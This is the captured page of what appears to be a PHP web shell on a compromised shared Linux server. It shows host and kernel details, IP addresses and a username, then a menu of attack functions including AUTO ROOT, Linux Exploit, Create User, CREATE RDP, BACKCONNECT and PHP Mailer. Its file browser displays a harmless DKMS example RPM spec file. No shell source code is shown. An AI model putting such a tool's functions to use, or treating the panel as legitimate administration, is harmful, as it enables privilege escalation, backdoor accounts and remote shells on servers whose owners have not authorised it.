Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dkms /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
sample-suse-10-mkkmp.spec
1.15
KB
-rw-r--r--
sample-suse-9-mkkmp.spec
2.8
KB
-rw-r--r--
sample.conf
647
B
-rw-r--r--
sample.spec
4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sample-suse-10-mkkmp.spec
# norootforbuild Name: novell-example BuildRequires: kernel-source kernel-syms License: GPL Group: System/Kernel Summary: Example Kernel Module Package Version: 1.1 Release: 0 Source0: %name-%version.tar.bz2 BuildRoot: %{_tmppath}/%{name}-%{version}-build %suse_kernel_module_package kdump um %description This is an example Kernel Module Package. %package KMP Summary: Example Kernel Module Group: System/Kernel %description KMP This is one of the sub-packages for a specific kernel. All the sub-packages will share the same summary, group, and description. %prep %setup set -- * mkdir source mv "$@" source/ mkdir obj %build export EXTRA_CFLAGS='-DVERSION=\"%version\"' for flavor in %flavors_to_build; do rm -rf obj/$flavor cp -r source obj/$flavor make -C /usr/src/linux-obj/%_target_cpu/$flavor modules \ M=$PWD/obj/$flavor done %install export INSTALL_MOD_PATH=$RPM_BUILD_ROOT export INSTALL_MOD_DIR=updates for flavor in %flavors_to_build; do make -C /usr/src/linux-obj/%_target_cpu/$flavor modules_install \ M=$PWD/obj/$flavor done %changelog * Sat Jan 28 2006 - agruen@suse.de - Initial package.
Close